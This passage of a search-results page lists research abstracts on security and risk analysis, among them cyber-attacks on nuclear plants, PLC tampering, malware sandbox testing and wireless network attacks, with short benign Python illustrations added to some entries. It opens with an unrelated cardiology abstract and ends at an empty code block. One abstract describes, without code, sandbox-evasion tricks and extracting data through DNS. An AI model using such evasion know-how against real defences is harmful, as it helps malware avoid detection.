    To study the phenomenology of attacks of atrial fibrillation (AF) and to compare it with the phenomenology of panic attacks, in order to elucidate the pathogenesis of atrial fibrillation and to elaborate rational therapeutic interventions, including those aimed at correction of psychovegetative abnormalities. Patients with nonrheumatic paroxysmal AF (n=105) and patients with panic attacks (n=100) were studied. Clinical, cardiological and neurological examination, analysis of patients' complaints during attacks of AF, and comparison of these complaints with diagnostic criteria for panic attacks were carried out. It was found that the clinical picture of attacks of AF comprised vegetative, emotional and functional neurological phenomena similar to those characteristic of panic attacks. This similarity, as well as the positive therapeutic effect of clonazepam, allowed us to propose a novel pathogenic mechanism of AF attacks. The severity of psychovegetative disorders during a paroxysm of AF can be evaluated by calculation of a psychovegetative index. The psychovegetative index should be used for detection of a panic attack-like component in the clinical picture of an AF paroxysm and thus for determination of indications for inclusion of vegetotropic drugs, e.g. clonazepam, in complex preventive therapy.

  20. An Analysis of Cyber-Attack on NPP Considering Physical Impact

    Energy Technology Data Exchange (ETDEWEB)

    Lee, In Hyo; Kang, Hyun Gook [KAIST, Daejeon (Korea, Republic of); Son, Han Seong [Joonbu University, Geumsan (Korea, Republic of)

    2016-05-15

    Some research teams have performed related work on cyber-physical systems, that is, systems in which a cyber-attack can lead to serious consequences including product loss, damage, injury and death. They investigated the physical impact of cyber-attacks on such systems. However, it is hard to find research on NPP cyber security that considers the physical impact or safety. In this paper, to investigate the relationship between physical impact and cyber-attack, level 1 PSA results are utilized in chapter 2 and a cyber-attack analysis is performed in chapter 3. The cyber security issue for NPPs is unavoidable. Unlike general cyber security, a cyber-physical system like an NPP can suffer serious consequences, such as core damage, from a cyber-attack. So in this paper, to find how a hacker can attack an NPP, (1) PSA results were utilized to find the relationship between the physical system and cyber-attacks, and (2) vulnerabilities of digital control systems were investigated to find how a hacker can implement possible attacks. It is expected that these steps will be utilized when establishing penetration test plans or cyber security drill plans.

  1. An Analysis of Cyber-Attack on NPP Considering Physical Impact

    International Nuclear Information System (INIS)

    Lee, In Hyo; Kang, Hyun Gook; Son, Han Seong

    2016-01-01

    Some research teams have performed related work on cyber-physical systems, that is, systems in which a cyber-attack can lead to serious consequences including product loss, damage, injury and death. They investigated the physical impact of cyber-attacks on such systems. However, it is hard to find research on NPP cyber security that considers the physical impact or safety. In this paper, to investigate the relationship between physical impact and cyber-attack, level 1 PSA results are utilized in chapter 2 and a cyber-attack analysis is performed in chapter 3. The cyber security issue for NPPs is unavoidable. Unlike general cyber security, a cyber-physical system like an NPP can suffer serious consequences, such as core damage, from a cyber-attack. So in this paper, to find how a hacker can attack an NPP, (1) PSA results were utilized to find the relationship between the physical system and cyber-attacks, and (2) vulnerabilities of digital control systems were investigated to find how a hacker can implement possible attacks. It is expected that these steps will be utilized when establishing penetration test plans or cyber security drill plans.

  2. Probabilistic methodology for turbine missile risk analysis

    International Nuclear Information System (INIS)

    Twisdale, L.A.; Dunn, W.L.; Frank, R.A.

    1984-01-01

    A methodology has been developed for estimation of the probabilities of turbine-generated missile damage to nuclear power plant structures and systems. Mathematical models of the missile generation, transport, and impact events have been developed and sequenced to form an integrated turbine missile simulation methodology. Probabilistic Monte Carlo techniques are used to estimate the plant impact and damage probabilities. The methodology has been coded in the TURMIS computer code to facilitate numerical analysis and plant-specific turbine missile probability assessments. Sensitivity analyses have been performed on both the individual models and the integrated methodology, and probabilities have been estimated for a hypothetical nuclear power plant case study. (orig.)
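
    A toy version of the Monte Carlo step described above might look like the following, where random missile ejection parameters are sampled and the fraction of damaging outcomes estimates a probability. The distributions, target sector, and energy threshold are purely illustrative and are unrelated to the TURMIS code.

```python
import random, math

def estimate_strike_probability(n_trials=100_000, target_azimuth_deg=(30, 40),
                                min_energy_mj=2.0, seed=1):
    """Crude Monte Carlo estimate of P(missile strikes and damages a target).

    Each trial draws a uniformly random ejection azimuth and a lognormally
    distributed kinetic energy (illustrative distributions only); the missile
    counts as damaging if it flies toward the target sector with enough energy.
    """
    rng = random.Random(seed)
    lo, hi = target_azimuth_deg
    hits = 0
    for _ in range(n_trials):
        azimuth = rng.uniform(0.0, 360.0)
        energy = rng.lognormvariate(math.log(1.5), 0.5)   # MJ
        if lo <= azimuth <= hi and energy >= min_energy_mj:
            hits += 1
    return hits / n_trials

p = estimate_strike_probability()
print(f"estimated damage probability per missile event: {p:.4f}")
```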

  3. Bridging Two Worlds: Reconciling Practical Risk Assessment Methodologies with Theory of Attack Trees

    NARCIS (Netherlands)

    Gadyatskaya, Olga; Harpes, Carlo; Mauw, Sjouke; Muller, Cedric; Muller, Steve

    2016-01-01

    Security risk treatment often requires a complex cost-benefit analysis to be carried out in order to select countermeasures that optimally reduce risks while having minimal costs. According to ISO/IEC 27001, risk treatment relies on catalogues of countermeasures, and the analysts are expected to

  4. Programmable Logic Controller Modification Attacks for use in Detection Analysis

    Science.gov (United States)

    2014-03-27

    AFIT-ENG-14-M-66. Unprotected Supervisory Control and Data Acquisition (SCADA) systems offer … control and monitor physical industrial processes. Although attacks targeting SCADA systems have increased, there has been little work exploring the

  5. Disposal Criticality Analysis Methodology Topical Report

    International Nuclear Information System (INIS)

    Horton, D.G.

    1998-01-01

    The fundamental objective of this topical report is to present the planned risk-informed disposal criticality analysis methodology to the NRC to seek acceptance that the principles of the methodology and the planned approach to validating the methodology are sound. The design parameters and environmental assumptions within which the waste forms will reside are currently not fully established and will vary with the detailed waste package design, engineered barrier design, repository design, and repository layout. Therefore, it is not practical to present the full validation of the methodology in this report, though a limited validation over a parameter range potentially applicable to the repository is presented for approval. If the NRC accepts the methodology as described in this section, the methodology will be fully validated for repository design applications to which it will be applied in the License Application and its references. For certain fuel types (e.g., intact naval fuel), any processes, criteria, codes or methods different from the ones presented in this report will be described in separate addenda. These addenda will employ the principles of the methodology described in this report as a foundation. Departures from the specifics of the methodology presented in this report will be described in the addenda.

  6. Disposal Criticality Analysis Methodology Topical Report

    International Nuclear Information System (INIS)

    D.G. Horton

    1998-01-01

    The fundamental objective of this topical report is to present the planned risk-informed disposal criticality analysis methodology to the NRC to seek acceptance that the principles of the methodology and the planned approach to validating the methodology are sound. The design parameters and environmental assumptions within which the waste forms will reside are currently not fully established and will vary with the detailed waste package design, engineered barrier design, repository design, and repository layout. Therefore, it is not practical to present the full validation of the methodology in this report, though a limited validation over a parameter range potentially applicable to the repository is presented for approval. If the NRC accepts the methodology as described in this section, the methodology will be fully validated for repository design applications to which it will be applied in the License Application and its references. For certain fuel types (e.g., intact naval fuel), any processes, criteria, codes or methods different from the ones presented in this report will be described in separate addenda. These addenda will employ the principles of the methodology described in this report as a foundation. Departures from the specifics of the methodology presented in this report will be described in the addenda

  7. Exploring Participatory Methodologies in Organizational Discourse Analysis

    DEFF Research Database (Denmark)

    Plotnikof, Mie

    2014-01-01

    Recent debates in the field of organizational discourse analysis stress contrasts in approaches as single-level vs. multi-level, critical vs. participatory, discursive vs. material methods. They raise methodological issues of combining such approaches to embrace multimodality in order to enable new contributions. Conceptual efforts have been made, but further exploration of methodological combinations and their practical implications is called for. This paper argues 1) to combine methodologies by approaching this as scholarly subjectification processes, and 2) to perform combinations in both...

  8. Comparative analysis of proliferation resistance assessment methodologies

    International Nuclear Information System (INIS)

    Takaki, Naoyuki; Kikuchi, Masahiro; Inoue, Naoko; Osabe, Takeshi

    2005-01-01

    Comparative analysis of the methodologies was performed based on the discussions at the international workshop on 'Assessment Methodology of Proliferation Resistance for Future Nuclear Energy Systems' held in Tokyo in March 2005. Through the workshop and succeeding considerations, it became clear that proliferation resistance assessment methodologies are affected by the broader nuclear options being pursued and also by the political situation of the state. Even the definition of proliferation resistance, despite the commonality of fundamental issues, derives from the perceived threat and the implementation circumstances inherent to the larger programs. A deeper recognition of these 'differences' among communities would help to advance the discussion toward harmonization. (author)

  9. Malware Analysis Sandbox Testing Methodology

    Directory of Open Access Journals (Sweden)

    Zoltan Balazs

    2016-01-01

    Full Text Available Manual processing of malware samples became impossible years ago. Sandboxes are used to automate the analysis of malware samples to gather information about the dynamic behaviour of the malware, both at AV companies and at enterprises. Some malware samples use known techniques to detect when they run in a sandbox, but most of these sandbox detection techniques can be easily spotted and thus flagged as malicious. I invented new approaches to detect these sandboxes. I developed a tool which can collect a lot of interesting information from these sandboxes to create statistics on how the current technologies work. After analysing these results, I will demonstrate tricks to detect sandboxes. These tricks cannot be easily flagged as malicious. Some sandboxes do not interact with the Internet in order to block data extraction, but with some DNS tricks the information can be extracted from these appliances as well.

  10. Sampling methodology and PCB analysis

    International Nuclear Information System (INIS)

    Dominelli, N.

    1995-01-01

    As a class of compounds, PCBs are extremely stable and resist chemical and biological decomposition. Diluted solutions exposed to a range of environmental conditions will undergo some preferential degradation, and the resulting mixture may differ considerably from the original PCB used as insulating fluid in electrical equipment. The structure of mixtures of PCBs (synthetic compounds prepared by direct chlorination of biphenyl with chlorine gas) is extremely complex and presents a formidable analytical problem, further complicated by the presence of PCBs as contaminants in matrices ranging from oils to soils to water. This paper provides some guidance on sampling and analytical procedures; it also points out various potential problems encountered during these processes. The guidelines provided deal with sample collection, storage and handling, sample stability, laboratory analysis (usually gas chromatography), determination of PCB concentration, calculation of total PCB content, and quality assurance. 1 fig

  11. Nondestructive assay methodologies in nuclear forensics analysis

    International Nuclear Information System (INIS)

    Tomar, B.S.

    2016-01-01

    In the present chapter, the nondestructive assay (NDA) methodologies used for analysis of nuclear materials as a part of nuclear forensic investigation have been described. These NDA methodologies are based on (i) measurement of passive gamma and neutrons emitted by the radioisotopes present in the nuclear materials, (ii) measurement of gamma rays and neutrons emitted after the active interrogation of the nuclear materials with a source of X-rays, gamma rays or neutrons

  12. Update of Part 61 impacts analysis methodology

    International Nuclear Information System (INIS)

    Oztunali, O.I.; Roles, G.W.

    1986-01-01

    The US Nuclear Regulatory Commission is expanding the impacts analysis methodology used during the development of the 10 CFR Part 61 rule to allow improved consideration of costs and impacts of disposal of waste that exceeds Class C concentrations. The project includes updating the computer codes that comprise the methodology, reviewing and updating data assumptions on waste streams and disposal technologies, and calculation of costs for small as well as large disposal facilities. This paper outlines work done to date on this project

  13. Update of Part 61 impacts analysis methodology

    International Nuclear Information System (INIS)

    Oztunali, O.I.; Roles, G.W. (US Nuclear Regulatory Commission, Washington, DC 20555)

    1985-01-01

    The US Nuclear Regulatory Commission is expanding the impacts analysis methodology used during the development of the 10 CFR Part 61 regulation to allow improved consideration of costs and impacts of disposal of waste that exceeds Class C concentrations. The project includes updating the computer codes that comprise the methodology, reviewing and updating data assumptions on waste streams and disposal technologies, and calculation of costs for small as well as large disposal facilities. This paper outlines work done to date on this project

  14. Constructive Analysis : A Study in Epistemological Methodology

    DEFF Research Database (Denmark)

    Ahlström, Kristoffer

    The present study is concerned with the viability of the primary method in contemporary philosophy, i.e., conceptual analysis. Starting out by tracing the roots of this methodology to Platonic philosophy, the study questions whether such a methodology makes sense when divorced from Platonic philosophy, and develops a framework for a kind of analysis that is more in keeping with recent psychological research on categorization. Finally, it is shown that this kind of analysis can be applied to the concept of justification in a manner that furthers the epistemological goal of providing intellectual guidance.

  15. Analysis for Ad Hoc Network Attack-Defense Based on Stochastic Game Model

    Directory of Open Access Journals (Sweden)

    Yuanjie LI

    2014-06-01

    Full Text Available The analysis of attack actions in Ad Hoc networks can provide a reference for the design of security mechanisms. This paper presents a method for analyzing the security of Ad Hoc networks based on Stochastic Game Nets (SGN). The method establishes an SGN model of the Ad Hoc network and solves for the Nash equilibrium strategy. After transforming the SGN model into a continuous-time Markov chain (CTMC), the security of the Ad Hoc network can be evaluated and analyzed quantitatively by calculating the stationary probability of the CTMC. Finally, Matlab simulation results show that the probability of a successful attack is related to the attack intensity and expected payoffs, but not to the attack rate.
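
    The quantitative step described above, obtaining the stationary probabilities of a continuous-time Markov chain, can be sketched as follows. The three-state generator matrix is a made-up example, not the SGN-derived model from the paper.

```python
import numpy as np

def stationary_distribution(Q):
    """Solve pi Q = 0 with sum(pi) = 1 for a CTMC generator matrix Q."""
    n = Q.shape[0]
    # Replace one balance equation with the normalization constraint.
    A = np.vstack([Q.T[:-1, :], np.ones(n)])
    b = np.zeros(n)
    b[-1] = 1.0
    return np.linalg.solve(A, b)

# Toy 3-state generator, rows sum to zero (states: idle, under attack, compromised)
Q = np.array([[-0.30,  0.25,  0.05],
              [ 0.40, -0.60,  0.20],
              [ 0.10,  0.00, -0.10]])
pi = stationary_distribution(Q)
print("stationary probabilities:", np.round(pi, 3))
```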

  16. Cyber-Attacks on Smart Meters in Household Nanogrid: Modeling, Simulation and Analysis

    Directory of Open Access Journals (Sweden)

    Denise Tellbach

    2018-02-01

    Full Text Available The subject of cyber-security, and therefore of cyber-attacks on the smart grid (SG), has become the subject of many publications in recent years, emphasizing its importance in research as well as in practice. One especially vulnerable part of the SG is the smart meter (SM). The major contribution of this work, which simulates a variety of cyber-attacks on SMs that have not been treated in previous studies, is the identification and quantification of their possible impacts on the security of the SG. In this study, a simulation model of a nanogrid, including a complete household with an SM, was developed. Different cyber-attacks were injected into the SM to simulate their effects on the household nanogrid. The analysis showed that the effects of cyber-attacks can be sorted into various categories. Integrity and confidentiality attacks cause monetary effects on the grid. Availability attacks have monetary effects on the grid as well, but they are mainly aimed at compromising SM communication by either delaying or stopping it completely.

  17. Weather and acute cardiovascular attacks: statistical analysis and results

    Energy Technology Data Exchange (ETDEWEB)

    Choisnel, E; Cohen, J Cl; Poisvert, M; van Thournout, A

    1987-01-01

    This study addresses the following question: to what extent could the onset of myocardial infarctions or cerebrovascular attacks be accounted for by short-term meteorological or environmental changes. The results from the Paris area are compared with results from Nancy (France), West Germany, and Japan. The authors conclude that weather change is one among other factors in the onset of myocardial infarction or of a cerebrovascular accident, but that the percentage of clinical cases really dependent on this atmospheric factor probably does not exceed ten percent of the cases. Far from being the only triggering effect, rapid fluctuations of the atmospheric situation have a marginal effect and are only an additional factor of risk in certain cases.

  18. Simplified methodology for Angra 1 containment analysis

    International Nuclear Information System (INIS)

    Neves Conti, T. das; Souza, A.L. de; Sabundjian, G.

    1991-08-01

    A simplified analysis methodology was developed to simulate a Large Break Loss of Coolant Accident in the Angra 1 Nuclear Power Station. Using the RELAP5/MOD1, RELAP4/MOD5 and CONTEMPT-LT codes, the time variation of pressure and temperature in the containment was analysed. The obtained data were compared with the Angra 1 Final Safety Analysis Report and with results calculated by a detailed model. The results obtained by this new methodology, together with its small computational simulation time, were satisfactory for a preliminary evaluation of the Angra 1 global parameters. (author)

  19. Robust Structural Analysis and Design of Distributed Control Systems to Prevent Zero Dynamics Attacks

    Energy Technology Data Exchange (ETDEWEB)

    Weerakkody, Sean [Carnegie Mellon Univ., Pittsburgh, PA (United States); Liu, Xiaofei [Carnegie Mellon Univ., Pittsburgh, PA (United States); Sinopoli, Bruno [Carnegie Mellon Univ., Pittsburgh, PA (United States)

    2017-12-12

    We consider the design and analysis of robust distributed control systems (DCSs) to ensure the detection of integrity attacks. DCSs are often managed by independent agents and are implemented using a diverse set of sensors and controllers. However, the heterogeneous nature of DCSs along with their scale leaves such systems vulnerable to adversarial behavior. To mitigate this reality, we provide tools that allow operators to prevent zero dynamics attacks when as many as p agents and sensors are corrupted. Such a design ensures attack detectability in deterministic systems while removing the threat of a class of stealthy attacks in stochastic systems. To achieve this goal, we use graph theory to obtain necessary and sufficient conditions for the presence of zero dynamics attacks in terms of the structural interactions between agents and sensors. We then formulate and solve optimization problems which minimize communication networks while also ensuring that a resource-limited adversary cannot perform a zero dynamics attack. Polynomial time algorithms for design and analysis are provided.
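
    The paper works with structural (graph-theoretic) conditions, but the numerical object behind a zero dynamics attack is the set of invariant zeros of the system (A, B, C, D). The sketch below computes them from the Rosenbrock matrix pencil for a toy SISO system; the matrices are arbitrary examples, and none of the paper's structural design machinery is reproduced here.

```python
import numpy as np
from scipy.linalg import eig

def invariant_zeros(A, B, C, D):
    """Invariant zeros of (A, B, C, D) via the generalized eigenvalues of the
    Rosenbrock pencil [[A - sI, B], [C, D]]; these are the frequencies a
    zero-dynamics attack can excite without appearing in the output."""
    n, m = A.shape[0], B.shape[1]
    M = np.block([[A, B], [C, D]])
    N = np.block([[np.eye(n), np.zeros((n, m))],
                  [np.zeros((C.shape[0], n)), np.zeros((C.shape[0], m))]])
    vals = eig(M, N, right=False)          # generalized eigenvalues of (M, N)
    return vals[np.isfinite(vals)]         # drop the infinite eigenvalues

# Toy single-input single-output system with one invariant zero at s = -1
A = np.array([[0.0, 1.0], [-2.0, -3.0]])
B = np.array([[0.0], [1.0]])
C = np.array([[1.0, 1.0]])
D = np.array([[0.0]])
print("invariant zeros:", np.round(invariant_zeros(A, B, C, D), 3))
```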

  20. An Evaluation Methodology for Protocol Analysis Systems

    Science.gov (United States)

    2007-03-01

    NS: Needham-Schroeder; NSL: Needham-Schroeder-Lowe; OCaml: Objective Caml; POSIX: Portable Operating System … methodology is needed. As with any field, there is a specialized language used within the protocol analysis community. … ProVerif requires that Objective Caml (OCaml) be installed on the system; OCaml version 3.09.3 was installed.

  1. Supplement to the Disposal Criticality Analysis Methodology

    International Nuclear Information System (INIS)

    Thomas, D.A.

    1999-01-01

    The methodology for evaluating criticality potential for high-level radioactive waste and spent nuclear fuel after the repository is sealed and permanently closed is described in the Disposal Criticality Analysis Methodology Topical Report (DOE 1998b). The topical report provides a process for validating various models that are contained in the methodology and states that validation will be performed to support License Application. The Supplement to the Disposal Criticality Analysis Methodology provides a summary of data and analyses that will be used for validating these models and will be included in the model validation reports. The supplement also summarizes the process that will be followed in developing the model validation reports. These reports will satisfy commitments made in the topical report, and thus support the use of the methodology for Site Recommendation and License Application. It is concluded that this report meets the objective of presenting additional information along with references that support the methodology presented in the topical report and can be used both in validation reports and in answering requests for additional information received from the Nuclear Regulatory Commission concerning the topical report. The data and analyses summarized in this report and presented in the references are not sufficient to complete a validation report. However, this information will provide a basis for several of the validation reports. Data from several references in this report have been identified with TBV-1349. Release of the TBV governing these data is required prior to their use in quality affecting activities and for use in analyses affecting procurement, construction, or fabrication. Subsequent to the initiation of TBV-1349, DOE issued a concurrence letter (Mellington 1999) approving the request to identify information taken from the references specified in Section 1.4 as accepted data.

  2. Nuclear methodology development for clinical analysis

    International Nuclear Information System (INIS)

    Oliveira, Laura Cristina de

    2003-01-01

    In the present work, the viability of using neutron activation analysis (NAA) to perform urine and blood clinical analyses was assessed. The aim of this study is to investigate the biological behavior of animals that have been fed chow doped with natural uranium over a long period. Aiming at time and cost reduction, the absolute method was applied to determine element concentrations in biological samples. The quantitative results for urine sediment obtained using NAA were compared with conventional clinical analysis, and the results were compatible. This methodology was also used on bone and body organs such as liver and muscle to help the interpretation of possible anomalies. (author)

  3. Dynamic Forecasting Conditional Probability of Bombing Attacks Based on Time-Series and Intervention Analysis.

    Science.gov (United States)

    Li, Shuying; Zhuang, Jun; Shen, Shifei

    2017-07-01

    In recent years, various types of terrorist attacks have occurred, causing worldwide catastrophes. According to the Global Terrorism Database (GTD), among all attack tactics, bombing attacks happened most frequently, followed by armed assaults. In this article, a model for analyzing and forecasting the conditional probability of bombing attacks (CPBAs) based on time-series methods is developed. In addition, intervention analysis is used to analyze the sudden increase in the time-series process. The results show that the CPBA increased dramatically at the end of 2011. During that time, the CPBA increased by 16.0% in a two-month period to reach the peak value, but remained 9.0% greater than the predicted level even after the temporary effect gradually decayed. By contrast, no significant fluctuation can be found in the conditional probability process of armed assault. It can be inferred that some social unrest, such as America's troop withdrawal from Afghanistan and Iraq, could have led to the increase of the CPBA in Afghanistan, Iraq, and Pakistan. The integrated time-series and intervention model is used to forecast the monthly CPBA in 2014 and through 2064. The average relative error compared with the real data in 2014 is 3.5%. The model is also applied to the total number of attacks recorded by the GTD between 2004 and 2014. © 2016 Society for Risk Analysis.
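
    A generic flavour of the time-series-plus-intervention modelling described above can be sketched with an ARMA model and a step regressor, as below. The data are synthetic and the model order is arbitrary; this is not the authors' fitted model of the GTD series.

```python
import numpy as np
import statsmodels.api as sm

# Synthetic monthly conditional-probability series with a level shift at t = 60,
# standing in for the kind of intervention effect described in the abstract.
rng = np.random.default_rng(0)
n, shift_at = 120, 60
step = (np.arange(n) >= shift_at).astype(float)        # step intervention regressor
y = 0.10 + 0.03 * step + rng.normal(0, 0.01, n)

# ARMA(1,1) with an intercept and the step function as an exogenous intervention term
model = sm.tsa.statespace.SARIMAX(y, exog=step, order=(1, 0, 1), trend="c")
fit = model.fit(disp=False)
print(fit.params)                                      # includes the estimated step effect

# Forecast 12 months ahead, assuming the intervention effect persists
print(fit.forecast(steps=12, exog=np.ones((12, 1))))
```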

  4. Simulation of Attacks for Security in Wireless Sensor Network.

    Science.gov (United States)

    Diaz, Alvaro; Sanchez, Pablo

    2016-11-18

    The increasing complexity and low-power constraints of current Wireless Sensor Networks (WSN) require efficient methodologies for network simulation and embedded software performance analysis of nodes. In addition, security is also a very important feature that has to be addressed in most WSNs, since they may work with sensitive data and operate in hostile unattended environments. In this paper, a methodology for security analysis of Wireless Sensor Networks is presented. The methodology allows designing attack-aware embedded software/firmware or attack countermeasures to provide security in WSNs. The proposed methodology includes attacker modeling and attack simulation with performance analysis (node's software execution time and power consumption estimation). After an analysis of different WSN attack types, an attacker model is proposed. This model defines three different types of attackers that can emulate most WSN attacks. In addition, this paper presents a virtual platform that is able to model the node hardware, embedded software and basic wireless channel features. This virtual simulation analyzes the embedded software behavior and node power consumption while it takes into account the network deployment and topology. Additionally, this simulator integrates the previously mentioned attacker model. Thus, the impact of attacks on power consumption and software behavior/execution-time can be analyzed. This provides developers with essential information about the effects that one or multiple attacks could have on the network, helping them to develop more secure WSN systems. This WSN attack simulator is an essential element of the attack-aware embedded software development methodology that is also introduced in this work.

  5. Simulation of Attacks for Security in Wireless Sensor Network

    Science.gov (United States)

    Diaz, Alvaro; Sanchez, Pablo

    2016-01-01

    The increasing complexity and low-power constraints of current Wireless Sensor Networks (WSN) require efficient methodologies for network simulation and embedded software performance analysis of nodes. In addition, security is also a very important feature that has to be addressed in most WSNs, since they may work with sensitive data and operate in hostile unattended environments. In this paper, a methodology for security analysis of Wireless Sensor Networks is presented. The methodology allows designing attack-aware embedded software/firmware or attack countermeasures to provide security in WSNs. The proposed methodology includes attacker modeling and attack simulation with performance analysis (node’s software execution time and power consumption estimation). After an analysis of different WSN attack types, an attacker model is proposed. This model defines three different types of attackers that can emulate most WSN attacks. In addition, this paper presents a virtual platform that is able to model the node hardware, embedded software and basic wireless channel features. This virtual simulation analyzes the embedded software behavior and node power consumption while it takes into account the network deployment and topology. Additionally, this simulator integrates the previously mentioned attacker model. Thus, the impact of attacks on power consumption and software behavior/execution-time can be analyzed. This provides developers with essential information about the effects that one or multiple attacks could have on the network, helping them to develop more secure WSN systems. This WSN attack simulator is an essential element of the attack-aware embedded software development methodology that is also introduced in this work. PMID:27869710

  6. Design and implementation of network attack analysis and detect system

    International Nuclear Information System (INIS)

    Lu Zhigang; Wu Huan; Liu Baoxu

    2007-01-01

    This paper first analyzes the present state of IDS (intrusion detection system) research, and classifies and compares existing methods. In view of the problems existing in IDS, such as false positives, false negatives and poor information visualization, this paper proposes a system named NAADS which supports multiple data sources. Through a series of methods such as clustering analysis, association analysis and visualization, the detection rate and usability of NAADS are increased. (authors)

  7. Vulnerability analysis and critical areas identification of the power systems under terrorist attacks

    Science.gov (United States)

    Wang, Shuliang; Zhang, Jianhua; Zhao, Mingwei; Min, Xu

    2017-05-01

    This paper takes the central China power grid (CCPG) as an example and analyzes the vulnerability of power systems under terrorist attacks. To simulate the intelligence of terrorist attacks, a method of critical attack area identification according to community structures is introduced. Meanwhile, three types of vulnerability models and the corresponding vulnerability metrics are given for comparative analysis. On this basis, the influence of terrorist attacks on different critical areas is studied, and the vulnerability of the different critical areas is identified. At the same time, vulnerabilities of critical areas under different tolerance parameters and different vulnerability models are obtained and compared. Results show that only a small number of vertex disruptions may cause some critical areas to collapse completely, and these can generate great performance losses for the whole system. Furthermore, the variation of vulnerability values under different scenarios is very large. Critical areas which can cause greater damage under terrorist attacks should be given priority for protection to reduce vulnerability. The proposed method can be applied to analyze the vulnerability of other infrastructure systems and can help decision makers search for mitigation actions and optimum protection strategies.

  8. A Hop-Count Analysis Scheme for Avoiding Wormhole Attacks in MANET

    Directory of Open Access Journals (Sweden)

    Chi-Sung Laih

    2009-06-01

    Full Text Available MANET, due to the nature of wireless transmission, has more security issues compared to wired environments. A specific type of attack, the Wormhole attack does not require exploiting any nodes in the network and can interfere with the route establishment process. Instead of detecting wormholes from the role of administrators as in previous methods, we implement a new protocol, MHA, using a hop-count analysis from the viewpoint of users without any special environment assumptions. We also discuss previous works which require the role of administrator and their reliance on impractical assumptions, thus showing the advantages of MHA.
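
    As a very loose illustration of hop-count-based screening (not the MHA protocol itself), the sketch below flags advertised routes whose hop count is implausibly small compared with other routes to the same destination, which is the kind of anomaly a wormhole shortcut produces. The tolerance and the route data are invented.

```python
def suspicious_routes(routes, tolerance=2):
    """Flag routes whose hop count is far below the typical hop count to the
    same destination -- a crude stand-in for hop-count-based wormhole screening."""
    by_dest = {}
    for dest, hops in routes:
        by_dest.setdefault(dest, []).append(hops)
    flagged = []
    for dest, hops_list in by_dest.items():
        typical = sorted(hops_list)[len(hops_list) // 2]      # median hop count
        for hops in hops_list:
            if typical - hops >= tolerance:
                flagged.append((dest, hops, typical))
    return flagged

# Hypothetical route advertisements: (destination, hop count)
routes = [("D", 6), ("D", 7), ("D", 2), ("D", 6), ("E", 4), ("E", 5)]
print(suspicious_routes(routes))   # the 2-hop route to D looks like a wormhole shortcut
```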

  9. ADTool: Security Analysis with Attack-Defense Trees

    NARCIS (Netherlands)

    Kordy, Barbara; Kordy, P.T.; Mauw, Sjouke; Schweitzer, Patrick; Joshi, Kaustubh; Siegle, Markus; Stoelinga, Mariëlle Ida Antoinette; d' Argenio, P.R.

    ADTool is free, open source software assisting graphical modeling and quantitative analysis of security, using attack–defense trees. The main features of ADTool are easy creation, efficient editing, and automated bottom-up evaluation of security-relevant measures. The tool also supports the usage of

  10. Analysis of the NIST database towards the composition of vulnerabilities in attack scenarios

    NARCIS (Netherlands)

    Nunes Leal Franqueira, V.; van Keulen, Maurice

    The composition of vulnerabilities in attack scenarios has been traditionally performed based on detailed pre- and post-conditions. Although very precise, this approach is dependent on human analysis, is time consuming, and not at all scalable. We investigate the NIST National Vulnerability Database

  11. Theoretical and methodological approaches in discourse analysis.

    Science.gov (United States)

    Stevenson, Chris

    2004-01-01

    Discourse analysis (DA) embodies two main approaches: Foucauldian DA and radical social constructionist DA. Both are underpinned by social constructionism to a lesser or greater extent. Social constructionism has contested areas in relation to power, embodiment, and materialism, although Foucauldian DA does focus on the issue of power. Embodiment and materialism may be especially relevant for researchers of nursing where the physical body is prominent. However, the contested nature of social constructionism allows a fusion of theoretical and methodological approaches tailored to a specific research interest. In this paper, Chris Stevenson suggests a framework for working out and declaring the DA approach to be taken in relation to a research area, as well as to aid anticipating methodological critique. Method, validity, reliability and scholarship are discussed from within a discourse analytic frame of reference.

  12. Theoretical and methodological approaches in discourse analysis.

    Science.gov (United States)

    Stevenson, Chris

    2004-10-01

    Discourse analysis (DA) embodies two main approaches: Foucauldian DA and radical social constructionist DA. Both are underpinned by social constructionism to a lesser or greater extent. Social constructionism has contested areas in relation to power, embodiment, and materialism, although Foucauldian DA does focus on the issue of power. Embodiment and materialism may be especially relevant for researchers of nursing where the physical body is prominent. However, the contested nature of social constructionism allows a fusion of theoretical and methodological approaches tailored to a specific research interest. In this paper, Chris Stevenson suggests a framework for working out and declaring the DA approach to be taken in relation to a research area, as well as to aid anticipating methodological critique. Method, validity, reliability and scholarship are discussed from within a discourse analytic frame of reference.

  13. Stress analysis of advanced attack helicopter composite main rotor blade root end lug

    Science.gov (United States)

    Baker, D. J.

    1982-01-01

    Stress analysis of the Advanced Attack Helicopter (AAH) composite main rotor blade root end lug is described. The stress concentration factor determined from a finite element analysis is compared to an empirical value used in the lug design. The analysis and test data indicate that the stress concentration is primarily a function of configuration and independent of the range of material properties typical of Kevlar-49/epoxy and glass epoxy.

  14. Malware Analysis: From Large-Scale Data Triage to Targeted Attack Recognition (Dagstuhl Seminar 17281)

    OpenAIRE

    Zennou, Sarah; Debray, Saumya K.; Dullien, Thomas; Lakhothia, Arun

    2018-01-01

    This report summarizes the program and the outcomes of the Dagstuhl Seminar 17281, entitled "Malware Analysis: From Large-Scale Data Triage to Targeted Attack Recognition". The seminar brought together practitioners and researchers from industry and academia to discuss the state of the art in the analysis of malware, from both a big data perspective and a fine-grained analysis. Obfuscation was also considered. The meeting created new links within this very diverse community.

  15. Requirements Analysis in the Value Methodology

    Energy Technology Data Exchange (ETDEWEB)

    Conner, Alison Marie

    2001-05-01

    The Value Methodology (VM) study brings together a multidisciplinary team of people who own the problem and have the expertise to identify and solve it. With the varied backgrounds and experiences the team brings to the study, come different perspectives on the problem and the requirements of the project. A requirements analysis step can be added to the Information and Function Analysis Phases of a VM study to validate whether the functions being performed are required, either regulatory or customer prescribed. This paper will provide insight to the level of rigor applied to a requirements analysis step and give some examples of tools and techniques utilized to ease the management of the requirements and functions those requirements support for highly complex problems.

  16. Cost analysis methodology of spent fuel storage

    International Nuclear Information System (INIS)

    1994-01-01

    The report deals with the cost analysis of interim spent fuel storage; however, it is not intended either to give a detailed cost analysis or to compare the costs of the different options. This report provides a methodology for calculating the costs of different options for interim storage of the spent fuel produced in the reactor cores. Different technical features and storage options (dry and wet, away from reactor and at reactor) are considered and the factors affecting all options defined. The major cost categories are analysed. Then the net present value of each option is calculated and the levelized cost determined. Finally, a sensitivity analysis is conducted taking into account the uncertainty in the different cost estimates. Examples of current storage practices in some countries are included in the Appendices, with description of the most relevant technical and economic aspects. 16 figs, 14 tabs
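
    The kind of calculation the methodology above leads to, discounting cost streams to a net present value and dividing by discounted throughput to obtain a levelized unit cost, can be sketched as follows with invented numbers.

```python
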